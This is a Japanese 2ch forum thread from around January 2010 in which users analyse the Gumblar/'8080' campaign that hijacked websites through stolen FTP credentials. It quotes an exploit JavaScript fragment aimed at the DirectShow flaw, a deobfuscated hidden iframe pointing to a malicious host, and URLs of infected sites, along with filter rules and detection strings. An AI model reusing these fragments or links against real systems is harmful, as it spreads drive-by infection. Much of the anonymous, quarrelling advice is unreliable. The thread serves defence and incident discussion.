ttp://www.virustotal.com/jp/analisis/bbb1b07545f46b6310ef1d8508e31437531a89a58e0cf263590bc4bce8ae68b9-1261938262

>>76
win.jpg のvirustotalスキャン結果
ttp://www.virustotal.com/jp/analisis/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4-1261938568

>>91
avastは誤検出しまくってるようだが
そのせいではないの？

JAVAを利用した攻撃の際は
win.jpgではなくJavaGame.jarがダウンロードされる
http://www.virustotal.com/jp/analisis/273460dd3c1cccd44da0e1f8e19e0cf506ad490f5624535cc789f65496e940f9-1261940810

ちなみにノートンではダウンロードしようとするときに検出するが
virustotalで検出されない

JAVAが無いときは
Adobe Readerも利用されるね

http://beatarai●blog90.fc2●com/

avastのスレでも書かれていたけど、
このブログは大丈夫？

win.jpg はDirectShowのMS Video ActiveX Control（CVE-2008-0015）の脆弱性攻撃。
JavaGame.jar はJRE（CVE-2008-5353）の脆弱性攻撃。
pdfupd.exe はAdobe Readerの脆弱性攻撃用の ChangeLog.pdf が落として来て実行するトロイの木馬本体。
他のルートでも最終的には同じものが落ちて来て、このトロイの木馬が Bredolab とか HDrop
とかで検出されるはず（でも今は全然検出してくれなぁ）のダウンローダです。

ダウンローダが、その後何をダウンロードしてくるかは、その時の攻撃者の気分次第。
攻撃側が用意したものを何でもインストールできちゃうわけね。

実行してみれば、その時点で落ちて来るものは分かるんだろうけど。

何か役に立つかもしれないので報告

fxwill●comにウイルスがあると聞き試しに見てみた（←阿呆）
/*GNU GPL*/〜というコードが埋め込まれてたっぽい
↓
サイトを開くと
このファイルの実行を許可しますか？というウインドウが出てきて（VISTA）
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる
↓
再起動して、通常起動でウインドウを開始すると
マイクロソフトセキュリティーエッセンシャルが反応
詳しい表示は憶えてないけど、表示されたファイルの削除を選択（履歴見ても何も残っておらず詳しいことが不明）
↓
PCはそのまま使えていたので安心していたら、
出先で自分のサイトを携帯でみたらエラー５００が表示されるのに気づく
↓
家に帰り、サーバーの履歴を見ると感染源のサイトを見た直後から複数のIPでログインされてた。
そしてパソコンの電源を切って外出した時間あたりでログインも止まっていた。
↓
もう１台のパソコンからFTPのパスワードなど変更
サーバー上のファイルも消去
ファイルを見るとindex.html index.php 〜.jsファイルがほぼすべて最下部に/*GNU GPL*/〜が埋め込まれていた。
↓
問題のPCにカスペの体験版を入れて（オンラインスキャンが停止中なので）みたら
スタートアップにsiszyd32.exeが検出されたので削除。
↓
今ここ

もうこれ再インストールするしかないんでしょうか。

追記

説明がわかりにくいね
自分のサイトはレンタルサーバー上にあり
FTPで更新しています。

>>99
感染した状態でサイト更新した？
それともFTPとか使ってなく自サイトにアクセスした覚えがないのにパス抜かれて改ざんされたの？

>>101

レンタルサーバーは２つ借りていて
片方はWORDPRESSの管理画面からログインはした。

でももう一方は数カ月まったく使っていないサーバーで
念のためにもう一台のパソコンから調べたらしっかりファイルが書き換えられてた。
どちらもFTPソフトにパスワードは登録していた。

サイト閉じてとっとと再インスコしろよ…

>>93
webシールドで止まるようになった。

https://twitter.com/digimaga

いや、アンタが最初にすべきことは、自分のサイトを閉じることだろ。。

どもども、９９です
サイトは閉めてサーバー上のファイルは全部消してるよ

今、PCの再インストール中
いらんソフトとか捨てるいいきっかけになったよ、スッキリ

>>106
FTPクライアントは何使ってるの？
パスワード保護に強いのはないかな？
FileZilla使ってるけど全く暗号化してないしこれ最低だよな

これってオンラインゲームのIDもとられるの？

そんなチンケな物はとらんよ、たぶん

>>>107

FFFTP使ってる

サーバーのログイン履歴詳しく見てみたけど
やっぱりパソコンの電源切った時からログインがなくなってる
感染から外出まで1時間、外出から帰宅まで4時間
感染
↓
感染に気付かずPC電源切り外出
↓
帰宅

電源切るまでは、ほぼ10秒単位でランダムなIPからログインあり。
その後帰宅するまでまったくログインなし。

あと、/*GNU GPL*/〜というコードの最後に規則的な英数字が０〜３００個ずつ改行されてくっ付いてた。

一応参考までに報告

「思い立ったら書く日記」と「べつになんでもないこと」はググって必ずチェックすることをオススメする。

遠慮しとく

>>110
参考になった。情報サンクス。

感染確認に
適当なフリーページ登録してFTPでアップロードしてみりゃいいのかな？

某ブログで見たが8080系はWinampの脆弱性も突くのか？

Winampの脆弱性ってのもよくわからないんだよな。
俺は必要十分余計な機能は欲しくないという理由でいまだに2.81を使っているんだが、現行とは
系統が違うこのあたりの古いバージョンにも同様の危険性があるのかねえ？

Winampは何度か脆弱性が話題になってるよな
出来れば最新を使うか使わない方が良い

WAN接続はCDDBからの情報取得だけでファイルを直接再生することは皆無なんだけどね。
最新版への更新も検討してみるかな。

>>115

この辺のことか？
| var ovCEkVSTS = document.createElement('object');
| document.body.appendChild(ovCEkVSTS);
| ovCEkVSTS.id = 'IWinAmpActiveX';
| ovCEkVSTS.width = '5';
| ovCEkVSTS.height = '5';
| ovCEkVSTS.data = './pics/win.jpg';
| ovCEkVSTS.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
| var tIx8bqnvuS = *** ShellCode ***

IWinAmpActiveXって名前付けてるけど、呼び出してるclassidはDirectShowだよ。
そんで、MSVideoの脆弱性（CVE-2008-0015）搭載のwin.jpgを食わせてShellCode実行！

違うだろ

>>119
ttp://img51.yfrog.com/i/73429545.png/

このウィルスって各ベンダーのスキャンで発見できるの？
FTPにファイル上げるときに、同じく登録してあった別パスぶっこ抜かれて全部改竄されたって話だけど
逆にFTPにパス保存してあっても、実際に起動して更新作業しない限り
サイト改竄は免れんの？
それとも感染直後に（感染後FTP未使用でも）勝手にパス抜きされて接続、改竄なの？

8080用チェッカー作った

Gumblarは新コードのテスト中？
＜script src=ｈttp://「中略」.php?op=java ＞＜/script＞＜body＞

俺もやれたんだけど
FFFTPに登録してあるサイトが全部がやられた
接続してないサイトもやられてたから
どれか1つ接続するとリストにある奴が全部やられたってことだな

つまりこれってFFFTPがハッキングされたことになるのか？
他の感染者がどのFTPソフト使ってるのかわかないからなんともいえないが

というか感染してからまだウィルスだと気づいてないとき自分のサイト見たら
AVGが反応したんだが、つまりウェブ上からは感染は防げてたってことだから
最初の感染はローカルってことになる

pdfとか見てたからやっぱり感染元はこれっぽいな

感染したときに設定読み取るのかもよ

>>121
うっ！ほんとだ。
2年ぐらい前のAOL Winampの脆弱性ぽいっすね。
わざわざインストールさせようとしているcabを落としてみたら
2005年4月版でやんの。何でAOLはこんな古いの置いてんだ。

>>99見てると、UAC有効にしてても効果がないってことか

新型8080系用のチェッカー出来たので公開してみるテスト
http://www12.atpages.jp/trick1/

俺はどこも信用できないね

>>129
せめて文字コードぐらい指定してくれ
IEで開いたら文字化けしてびびったｗ
ウィルスかた思ったぜｗ

もうネットにつながないから
この脅威が去ったら電話くれ！

結局、感染したらFTPで鯖にファイル上げるしか確かめようは無いのか？
感染した奴は皆このルートで判明？

>>131
ごめんなさい＞＜文字コード指定しました

ここに張ってるURLは危険そうですな

/*GNU GPL*/踏んだ可能性があるんだけど
spoolsv.exeってのが新たに出来てる気がする
これ関係ある？

>>136
spoolsv.exeはプリントスプーラだよ。
プリントジョブの仕掛かりが溜まってない？

>>137
いや、それが少なくともここ1年はプリンタにつないでないPC
なのにマカのファイアーウォールの設定でもいつの間にか送受信完全に許可扱いになってる
そもそもタスクマネジャでメモリ使用上位にそんなのは今までいなかった気がする
で、spoolsv.exeでググったら、トロイの偽装の可能性と出てきたんで

でもフルスキャンしても何もでてこないし
CPU使用率は安定してるし
少なくとも表面上はPCがどこかにアクセスしっぱなし、と言う風には見えないし
もうどうすりゃいいんだか

>>131 乙
ついでに、Gumblarの簡易チェックも組み込めないかな？

</head><script src=http://*.php ></script><body
これがあったら黒判定って事で。

>>138
サービスを殺しても生きてたら
変なのが寄生してると思われ。

>>138
Process ExplorerかSlightTaskManager(これはXPまでらしい)でspoolsv.exeのパス(フォルダ)を
確認して、spoolsv.exeのファイルのプロパティで作成日時、更新日時、等がおかしくないか確認。
その後、spoolsv.exeをvirustotalでチェックする、くらいしか思いつかない。

>>140-141
Process Explorer等入れてないんで（この状況下でネットつなげないし）
マカのアクセス許可設定にあったパス(system32以下)でプロパティチェック
作成日時、更新日時は随分前のまま変わらず(少なくとも踏んだ可能性のある日じゃない）で56.5kb
メモリの使用量は38.956
ネットきってるんでvirustotalに確認にいけてないが、なんとなく白っぽい
気がするんだがどうか

サイト管理者以外で、/*GNU GPL*/感染確認するには、本当どうしたらいいんだろうか

spoolsv.exeはOSにデフォルトで入ってるだろ

>>143
もちろんそうなんだが
どんだけスキャンかけても何にも引っかからないんで、
とりあえず普段と（多分）違う挙動のものを虱潰しにしてるんだよ
spoolsv.exeがトロイ偽装のケースもあるって話しだし
/*GNU GPL*/感染で、実際にどんな症状が出るかってのが全く聞こえてこないんだが
サイト改竄以外に何があるんだ？

つうかPC調子悪いときに携帯規制とかキッツイ

>>139
今回のバージョンアップの際に簡易的にチェックするようにしました。
もしかしたら誤検出があるかもしれません

>>144
別のウイルスをダウンロードしてきます。

どこの馬の骨だよ

>別のウイルスをダウンロードしてきます。

今回感染後も普通にPCつかえてて、自サイト改竄が発覚して漸く感染に気づくとか
そんなのばっかりな気がするけど
/*GNU GPL*/感染のケースで他のウィルス呼び込んだ事例あがってんの？

紅白FLASH合戦スレで/*GNU GPL*/報告出たけどスルーされてたな
何人か開いちゃったんじゃないのあれ

なんかあっちこっちのスレで/*GNU GPL*/のURL貼られてる割に
いまいち騒ぎになってないよな
JRやホンダまで感染したのに、そこを踏んで自分が感染したっていう犠牲者の声が少ない
GENOのときはPC再起動不可っていう分かりやすい（といか致命的）エラーが出たから
皆感染が分かったけど
今回は自覚症状無いまま、感染後そのままPCで飼ってるやつ多い気がするんだが

アドビ関係全部アンインスコして専ブラで2chだけを見るネット生活を八ヶ月続けてるが
それでも不安が拭えない

オミで/*GNU GPL*/を含むscriptタグを殺しちゃえばいいんじゃね

>>149
Gumblarの時にはコマンドから起動出来る出来ないや
ファイルのサイズでで見分けられたりしたけど
今回はどうやって見分けるかのかまだよく分からないしなあ・・・
各種アンチウイルスソフトは感染しているときちんと動作するのかとかも。

違法ファイルのダウンロードの法律よりも、故意にウイルスばらまいたやつに
罰則強化とかしてほしい。

今回のは感染後、各ベンダーのサイトが開けなくなったとか
MSアップデートが出来なくなった、とかそういう話も聞かないよな
今のところは「FTPでパス抜きされたあと」から、10秒単位で不正アクセスっていう
コレくらいしか目立った特徴は出てない気が

年明け早々、会社のWEBページが改ざんされたｗ

形態に電話があり、今から出勤、最悪。

Gumblar再開とかかいてあるし、何されてるのか。

正月休みもパーだな。

脆弱性対策をしててもプラウザのJavaScriptがオンなら、8080サイトからマルウェアが自動的に
ダウンロードされて、発動はしなくてもPC内に残るのかな？もしそうなら、それはそれで気持ち悪いな

>>154
ドンマイw

>>155
いや

Adblock Plusの存在を忘れてた･･orz

・8080
*:8080*$script,link,object

・Gumblar
*.php$script,link,object

ttp://pc11.2ch.net/test/read.cgi/sec/1262054865/392-405　から。
　→ ttp://www●stardustpictures●co●jp/katagirihairi4/

カスペルスキーのオンラインウイルススキャンは現在は停止中なのかな？

某所から転載
--ここから--
www●ideele●nl/a-home.htmに埋め込まれたコードの難読化を解除すると
＜iframe width=1 height=1 border=0 frameborder=0 src='ｈttp://sodanthu●com/in6.php'＞＜/iframe＞
--ここまで--

↓同一のコードが仕込まれてる↓
tp://rcmorningstar●com/cp/scripts/formmail-doc/example_src●html

因みに>>129のチェッカーはスルーする。

チェッカーだめじゃんｗ

>>161
カスぺは反応するが

>>159
30日くらいにモームス板(?)に
"超一流芸能事務所スターダストのホームページにトロイの木馬"
ってスレが立ってたようだけど、それかな？
スレ自体は直ぐに落ちた様だけど。

avast!だと、JS:Illredir-B [Trj] で
カスペルスキーだと Trojan-Clicker.JS.Iframe.db なのかな？

先日、avast!が JS:Illredir-B [Trj] をブロックしてくれたのかも知れないけど
個人ブログとかにも広がってるかも。

>>110
乙です。

感染すると自動的に他のPCから他のPCからかきかえにくるのかな。
ボットか何かかな。

カスペのオンラインでもいまだと検出されるの？

>>160ニフの方も止まってるの？

>>166
ニフティの方は分からないけど、公式(日本語)サイトの方は
年末年始って事なのか停止中っぽいけど。

"<script>function" "return String.fromCharCode(c);" "getElementById("
高確率でヒットするので、これで捜索中･･･

>>167
ニフの方はいけたはずだけど、中身同じじゃねえの？

よくよく読んでみたら、上で報告の上がってる>>99ってFFTTP起動させるまえ、
感染サイト踏んだ直後から自サイトにアクセスされて書き換えされてたって事？
となると、踏んでアウトなら、
その瞬間にFTP起動有無にかかわり無く速攻保存してある管理パス抜かれて
改竄されるって事か

FFFTPだった。まあいいや

>>161
検索してみた

悪意のあるリンク先URLのリスト（マルウェアドメイン一覧）
ttp://www.itis.tw/badlink
↑ここにリストがありますね
ホストするIP:127.0.0.1

ttp://www.itis.tw/badlink←誰が作ったの？

>>161
反応するようにしました。

>>172
台湾人だろ

GNU GPLのやつなんてファイアウォールで
アウトバウンド制御してるだけでも防げそうだけどな
感染した人は入れてないだろ

>>174
知らねえ奴は黙ってろ

>>175
そう言えば
なぜかファイアウォールのアウトバウンド制御はいらないとか主張するやつが最近増えてたな
それだけでも防げることなのに

シナの留学生が工作してるんだろｗ

中国のIP防ぐだけでもかなり安全になるよね

"fff=op.split(" "fff.op.replace(" の検索結果 約 14,200件

>>172
サイトのタイトル
惡意連結網址列表 (Malware Domain List) | 資安之眼
実際に表示されるサイトのURL
ttp://www.itis.tw/badlink
IPアドレス
60.248.88.10
逆引きホスト名
ns1.misway.com

>>176
知らねえ奴は黙ってろ

あーわかった
FFFTPのインポート/エクスポートってレジストリファイルを読み込み/出力してる
だからGumblarはレジストリからFTPでアクセスする（改ざんする）サイトをみてるわ

FTPソフトってどれもレジストリいじってるのか？

てっきり普通のファイルに保存してるのかと思ってたぜ

FFFTPはini保存もできるし、パス抜きは普通にポート見てるだけだろ。
FTPは平文で、だからSFTP使えって話になってるんだよ。

>>183
知らねえ奴は黙ってろ

>>183
>>125の状況みるとポートだけ見てるだけではないと思うが
レジストリにＦＴＰのIDとパスを書き込んでるんから
そこで見破られたんじゃないかという話
SFTP使ってもレジストリいじるソフトなら意味んじゃないか

まあ感染してない奴が憶測で言ってもしょうがない

Unmask Parasites. Blog.がものすごく詳しいな。

うわまたきてるｗｗ
放置してたんでパス変えるの忘れてたサイトみたらやらてたｗ
時間は2010/01/02 23:27

やっぱ感染するとFTPのIDとパス盗まれてるわ
FTP接続しなくても改ざんされてるｗｗ

「F-Secure Exploit Shield 0.70 build 19」
ttp://www.f-secure.com/en_EMEA/downloads/beta-programs/home-office/exploit-shield/index.html
解説サイト→ttp://all-freesoft.net/soft/vulnerability/f-secureexploitshield/f-secureexploitshield.html

XP SP3でavast!と共存させて人柱してるが、問題無く稼動中。

F-Secureはこれ検出すんの？

じゃあ、ウィルスサイト踏んでも、FTPインスコ済みID記憶済み、FTP未接続で
サイト感染が無ければ白ってことか？

>>189
試したところ駄目っぽい感じ

>>186のブログの翻訳を読んでみたが
今発病してるサイトの運営者はだいぶ前から感染していて
すでにFTPのIDとパスは盗まれてるようだ
だからウィルスまいた奴の好きな時間にサイトを改ざんできる
防ぐにはFTPのパスを変えるしかなさそうだ

だいたいこんなかんじじゃね
GNU GPL踏むとFTPのIDとパスがあれば盗まれる
サイト運営してない人はたぶん無害かも

改ざんの告知にウィルススキャンだけでなく
サイト運営者はFTPパスの変更も加えたほうがいいかもな

JRの時は2週間ぐらい放置してたんだろ
FTPパス盗まれた運営者まだたくさんいると思うぜ

何を今更

>>186でもの凄く詳しいな、って書いてるけど内容はその程度なのか

トークン認証でよくね？

よ〜く見たら、ですね･･･
防いでくれてるのは
CVE-2006-3730
CVE-2007-0038
CVE-2006-4868
CVE-2006-4301
CVE-2008-3008
CVE-2006-0005
CVE-2008-4844
CVE-2009-0901
CVE-2009-0927

「CVE-2009-4324」入って無いじゃん･･･ (´･ω･｀)

gred AVアクセラレータの方が良いかもしれん

gredなんか論外だが
aviraやavastやらでも対応は出来る
ファイアウォール程度入れとけ

FWで防げるのに広まってるの？

ファイアウォール入れとけばおかしな通信があるからすぐ分かるね
実際にこの通信がパスワードを流してるかどうかは不明だけど
間違いなくおかしいと気づく

多くの人が無防備ってことだろうな
MSEなんか使ってファイアウォールはWin標準なんて人も多かったんじゃないのかな

実際のところサイト運営者以外無害なのか

おまえらサイト運営してるの？

>>187以外にいる？

報告にもあるとおり
Windows起動時のスタートアップに実行ファイルを登録する
その実行ファイルが通信する
その他システムの改変は今のところ俺は確認してない
しかしどんな攻撃でも可能だから注意は必要

>>197
PC Tools（笑）を入れてるよ
v6.0.0.86

Firewallのログを見ておかしな通信を見つけたところでもう遅い
その通信を止めてくれてこそ役立ったってことでしょ
だいたい警告もないのにFWのログなんて見ます？
実際には大手のサイトのWEB制作会社がFWも入れてないとは
考えられないので、FWは突破されてしまっているんでしょうね

最初の通信で問い合わせがあるだろ
まあ使ってるソフトにもよるがそう言うソフトを使えってこと

>>204
知らねえ奴は黙ってろ
君にはこれが適切

>>205
そういうのをセキュリティソフトに対する過信って言うんだよｗｗｗ

試せば分かること
知らねえ奴は黙ってろ

>>207
書き込み内容からして無知なのは明らかだが
なんでそんな自信ありそうな語り口なんだ

>>208
じゃあ、何を試してどういう結果になったか全部書き出せよ
FWを入れていれば大丈夫みたいないい加減なこと書き込まないでさぁあ

>>210
このスレに全部書いてあるんじゃないか
このスレは色んな人がいるから仕方ないが
まともなこと言っても無知なやつが偉そうな口調で否定するからこまる

>>211
だから、具体的にどこのFWなら、ちゃんと警告を出して
どこのものなら、簡単に突破しているって出してみろよ

初心者スレいけよ

なんだここは、全くの役立たずスレだな
実際にはFWが役に立っているかどうかなんて分からないくせに
いい加減なこと書き込むんじゃね〜ＹＯ・・・ボケｗ

お前みたいなやつは何言っても駄目だろ
全部書いてあるって言ってるのに
だから自分で試せよ

>>214
質問するならちゃんとした文章で質問してくれ
偉そうな態度で聞かれても誰も答える気は起きない

>>204
君はサイト管理者を過信してるんだよ
サイト管理者なんていい加減なんだろうな
そうでもなければこんな
>>159
こんなに放置されないだろ

＞サイト管理者なんていい加減なんだろうな
だよな
はいりのとこまだ埋め込まれてるしｗ

あと削除してもちゃんと告知してるとこなんてわずかだろ
他の運営者にも広めてちゃんと対策とらせないとまだまだ続くぞこれ

そうだな、アホなサイト管理者はたいてい

Avira AntiVir Personal＋Comodo Firewall

で完璧！
これ以上のセキュリティはありませんとか信じ込んでるからなｗｗｗ

アホなサイト管理者を叩くのはいいが何とかしてもらわないと困るのは俺らだぜｗ

全容が全く掴めていない感じがする。
IBM Tokyo SOC Reportがツールを名指しするなど速い感じがしているけど。

シス管ってなにもできないの？

それなりの規模になると会社の各PCにパーソナルファイヤウォールを入れないことが多い。
シス管のPCも例外ではない。
会社のシステムでトラブルの原因になるから。

そもそも、ファイヤーウォールが反応したときは、すでにウイルスを埋め込まれていたとき。

ところでウイルスに感染したPC自体ででウイルスがかってにサイト書き換えたりはしないのかな

ローカルに保存されてるHTMLファイルを書き換えるってのは、よくある手法だけど

今回のGumblarの騒ぎをまとめると

最初の感染ルートはadobeの0-dayでこのときにFTPのIDとパスが盗まれる
このときは感染したかはわからずウィルススキャンでも検出できない

発病の第一弾がJR東日本やHONDAのときで12/20ごろ
第二段が12/25ごろ、中小サイトに感染がみられこのスレが立ったころ
第三弾が1/2 >>187

この発病というのがHPの改ざんでGNU GPLが埋め込まれるということ
すでにFTPのIDとパスが盗まれてるので運営者が接続してなくても第三者が改ざんできる

でこのGNU GPLが埋め込まれたHP見てもロシアなどの怪しいサイトに接続しようとするだけで
セキュリティソフトも反応ので実際のところ無害と思われる

こんなところだな

以上、古畑任三郎でした

要は自分が管理するFTPサーバを持たない奴は特別気にすることはないと理解していいのか？

今のところは
ただ言われているとおり
いつ攻撃が変わるか分からない
プログラムを実行できてしまうのでどんな攻撃も可能だから注意

個人用のセキュリティソフトはほとんど役に立たないで・・・ＦＡ

そんなことはない

んだんだ
脆弱性突かれているのを防ぎきれるもんではないわな
FWもやられてしまうと考えるのが普通

あほ

むしろ無知な人以外にはかなり防御しやすい攻撃

大騒ぎになるマルウェアって単純なやつも多いよな
P2Pで流行った情報流出みたいにファイアウォールだけで防げるのも多い
ファイルを実行しちゃう時点で駄目だけど

FTPアカウントを攻撃者に送る通信って、何番のポートで行われる？
これが80番や443番とかじゃなければ、アウトバウンド通信の制御をしてれば
ある程度防げそう。

だから制御なんて考えなくてもポップアップされるって
あくまでも今のところな

防げれない。

>>234
単純だからアンチウイルスも検出しにくいって言うのもあるね

脆弱性を突かれしまったらアンチウイルスもFWも全くの無力
ここの連中どんだけ呑気なんだよｗｗｗ

しつけえな

悔しいから嘘まき散らしてるんだろ
べつに争ってるわけじぇねえんだからやめろよ

脆弱性突かれてもFW入れていれば情報は漏れない・・・ぷぷぷ
嘘の情報流すのはよせよ

FW云々は
事前に感染を防げるかと
感染後の被害を防げるかで
話が噛み合ってない気がする

要は0-dayをどうやって防ぐかってことだろ
Adobe Reader使わなきゃいいんじゃね

>>243
話はかみ合ってないが
漏れてないと思うね

>>244
もちろん脆弱性をふさぐのは基本だけどね

たとえ脆弱性残したままだったとしても
FWがあればこの攻撃に気づくってだけの話

誰もFWで感染が防げるとか言ってない
一人勘違いしてるみたいだが
同じような人がいるかも知れないから勘違いしないようにね

実際は性能の良いHIPSがあるFWなら防げるけどね

>>242
こいつはなんにも分かってない
脆弱性も分かってない

snortとかに検知ルールがりがり書けばええねん

adobeなんで0DAY長期間放置してるんだ？

adobeに関してははっきりと告知すべきだよな
ほとんどの人は知らないんじゃないか

データ抜いて外部に流すタイプならいいけど
システムやファイル破壊するタイプとか出たら
FWじゃどうしようも無いからなぁ

少なくともカスペは駄目だった
http://oshiete1.goo.ne.jp/qa4982913.html

>>252
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ

>>252
FlashPlayer更新してない人も世間的に結構居るんでね？
どこそこの動画サイトで不具合出るから古いのに戻したとかも居そう

>>256
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ

>>255
そんなこと思うわけねえだろ
頭大丈夫かよ
情報が行き届いてないから感染するんだろ
馬鹿め

>>255
おまえそんなに悔しいのかよ

>>258
自分で情強とか思ってるだろ

>>259
おまえそんなに悔しいのかよ

>>260
なんだよ情強って？
日本語で書いてくれよ

>>262
おまえそんなに悔しいのかよ

悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ
勘違いしてるんじゃないか

>>254
かわいそうに悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ ｗｗｗ

ファイアウォールやアンチウイルスの設定書き換えちゃったりは無いの？

>>266
今のところ無許可で書き換えはないと思う
最近のは保護機能があるのも多いしね

http://oshiete1.goo.ne.jp/qa4982913.html
自分も初期のGENOウイルスでカスペルスキーで感染しました。
良くHIPSやプロアクティブの事を言われる方を見受けますが実際は
GENOウイルスには全く役に立ちませんでした、

そのGENOで４月末から５月初旬まで非常に困った経験者です。
初期のものはカスペルスキーでも反応はするのですが阻止できませんでした。
前バージョンの7.0をWin2000で使っていましたが、アドビリーダーの５と9を
両方混在させていたのが失敗でした。

IE6、ファイヤーフォックス３でのグーグルツールバーに細工をしてしまい、
何を検索しても、海外の謎の黒バックに青文字のサイトが表示されてしまいました。
次に出たバージョンでは、なにを検索しても404Not Foundと表示されて、
（404にも色々なバージョンがありました。）実は表示自体がウソで他のサイトに
さらにアクセスさせようとしていました。何かの送信が止まらない、ネットワークの
切断出来ない。IPアドレスの解放と再収得が出来ない。なんだこれは。といった
状態で、ブチ。とLANケーブルを引っこ抜きました。

>>267
どうもです
取り敢えず安心できそう

ていうかこれもうGENOと呼ぶには違うんじゃね
ＪＲＥって呼ぼうぜｗ

>>243
実際>>159で試したところ
FWで最初に確認できるアクセス以前での情報流出は確認できない
あくまでもそのサイトでってことだけどね

http://imepita.jp/20100104/114370

私のPCが起動するとこんな風になるようになったんですが、
これはこのスレのウイルスに該当しているんですかね？

ちなみにOSはvistaで、
この画像の状態は起動して、
ロゴマークがでて、ユーザーログインしてからの状態です。

矢印のアイコン出て固まる感じ？なら、そうだよ。

カーソルは動くんです
でも背景が真っ暗で、下のスタートのバー？所が真っ白になってます。
真っ白な所に合わせると、矢印から砂時計になります。
この画面から何も操作できないです。

どうすれば復旧できますか？
甘えかも知れませんが、教えていただけるとありがたいです。

>>268
＞自分も初期のGENOウイルスでカスペルスキーで感染しました。
＞良くHIPSやプロアクティブの事を言われる方を見受けますが
＞実際はGENOウイルスには全く役に立ちませんでした、

カスペルスキーの無力ぶりにワロタｗｗｗ

たかが個人向けの有料あるいは乞食版FWのログを見て無理やり
安心しようとしているところが笑えるスレですね

回避されてるんじゃぁあって思わないのかね
でなきゃこんだけ広がるのはおかしいでしょ

>>276
こういうスレ見てる奴はまあいいんだよ

問題なのはPCに使われてる(笑)一般人
GumblarとかGENOとか知ってる？て聞いても「なにそれ」で終わる
もちろんセキュリティソフトなんて入れてないし、入れようともしない
家電感覚でPC買ってる奴はこんなんばっかりだな

>>276
ほんとしつこいね
その程度の人はお前だけだよ

>>278
ほんとしつこいね
その程度の人はお前だけだよ

たしかに>>278が一番バカっぽいｗｗｗ

しつこい阿呆のために説明すると
脆弱性を利用してpdfupd.exeがダウンロードされ実行される
トロイ本体が解凍され実行される
ここで通信が行われるからすぐ分かるって話なんだよ
異変に気づけば何らかの対処ができるだろうってこと

一番バカっぽいのは>>278で決まりですね！！！

それでも分からないなら自分で試せ
これでおしまいにしてくれよ

よほど悔しかったみたいだなｗ

>>281
で、どこのFWなら分かって、どこのFWなら分からないの？

外向きの通信が発生したとき分かるようなソフトならどれでも良いだろ
分からないFWは外向き通信を監視しないやつやそう設定してる場合

具体的にと言うなら俺はOutpostを使ってる
もちろんその他のソフトでも問題ない

アウポなら大丈夫かもしれんけど、そんなもん普通使ってないから

海外からのFTP接続を拒否れば書き変えは不可能ってことでOK？

そんな設定レン鯖で出来るんか？

普通のレン鯖じゃ無理だろうね

>>274
>>4
テンプレ見てないんじゃ甘えだろ
感染前のレジストリに戻せば直るかもな

年末に感染サイト踏んで、今日までPCオフで様子見。ようやくFTP起動させてサイトのデータDL
数分待って自サイトソース確認するも改ざん現れず

何故生き残ったのか、自分でも分からん
XP（昨年11月以降未うｐ立て）、IE6（ジャバスクオン）
adobeリーダーのジャバスクは切ってあったが、これが命綱だったのか？

年末にadobeらしきアップデートが出てきてPCがクラッシュしたとか言い出したのが社内にいて
そいつに教えておいたFTPアカウント全部書きかえられてたわ

陥落サイトを掘ってみた。
tp://kyu-ta●sakura●ne●jp/blog/
tp://kyu-ta●sakura●ne●jp/nekkei080401●mht
tp://blog●dtpwiki●jp/dtp/
tp://pcafe●blog3●fc2●com/
tp://blog3●fc2●com/pcafe/
tp://tukimisou●s10●xrea●com/
※〜〜xrea.comは全滅っぽい気がする

tp//lists●sourceforge●jp/mailman/archives/slashdotjp-dev/
tp://www●aoki●ecei●tohoku●ac●jp/topic/RSNA_press_release/HealthImaging_com●mht
妙なとこだけ改竄されてるし

gumblar．cn/が復活してるね
↓
http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn/&hl=ja
Google が最後にこのサイトを巡回したのは2010-01-03で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-03です。

＞＞294
教えてやれよ

>>296
294じゃないけど、fc2の方にメールを送ろうと思ったら
IDを持っていないとそもそも相手にしてくれないようなので
メールすら送れない・送り先が分からない。

こういうので個人あてにメールを送っても返信が来た試しがない。

>>294
どこもやられてないじゃん。
お前さんのキャッシュに妙な物が追記されるなら、お前さんが感染してるんじゃね。

>>298
確かに仮想機（うぃんXP2）で踏んでみても何も起こらない・・・

>>294
新手の宣伝か？（笑）

Trojan.Injectに感染した >>294 が居ると聞いて

モロゾフの公式サイトでトロイ配布中
http://tsushima.2ch.net/test/read.cgi/news/1262611814/

GNU GPLの8080ですな。

PDigiiEPG.exeだと！？

>>298-299
釣ってすまなかったが、
感染してないという検証ありがとう。

【8080チェッカー】
ttp://www12.atpages.jp/trick1/
↑↑↑
ザル＆誤検出過多という事が証明されたよw

ザルは仕方ないとしても、語検出もするのかよｗ

>>292
数分じゃわからんよ

どうやらこのスレは釣り堀化してるな（笑）

アホが釣れた

>>1-999
本スレはこっちですよ。

GENOウイルススレ　★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/

>>302
に飛んだらNODが反応したんだけど大丈夫かよ

反応したんだから大丈夫だろ
モロゾフで急に騒がしくなったな

コードそのまま貼った奴がいるからな

何故毎度毎度ソースの見方も知らないくせに、あほなチェッカーを信用して
騒ぎ立てるバカが発生するのか
しかもわざわざセキュ板覗いてる程なのに

>>314
色んなやつがいるから仕方ない

モロゾフ
ttp://www.virustotal.com/analisis/94a2bd34b99ebb992e019c2b7b05e4ed6e6b9400b313b1de1cd60366e2eaa2b3-1262614148

今更もう良いよ
ずっとその話してるのに

モロゾフ、アウト〜

こんどはモロゾフか
いちおう、MicrosoftのSmartScreenと、ゴーグルのセーフブラウジングとやらに
モロゾフ報告したけど、いまだに変化なし

>>314
チェッカーの性能がわかったじゃないかw

http://127.0.0.1にアクセスで感染確認ってできる？

無理

>>307
一晩たったが大丈夫そうだ
やっぱReaderのジャバスク切ってたのが効いたらしい。今では大抵のベンダーが検出できるっぽいし、漸く一安心だ

>>76
踏んじゃった
でもnorton先生が止めてくれた

何かうちのport2049から某RSSサーバにやたらリクエストが送られてるんだが、このウィルス？

ブラウザのRSS機能なんじゃね？

そこまでわかっててGeno疑うってどういう知識の偏り方なのか疑問だ

ヤフートップｷﾀ━━━━(ﾟ∀ﾟ)━━━━!!!!

今日の夕刊読売新聞ガンブラー記事一面
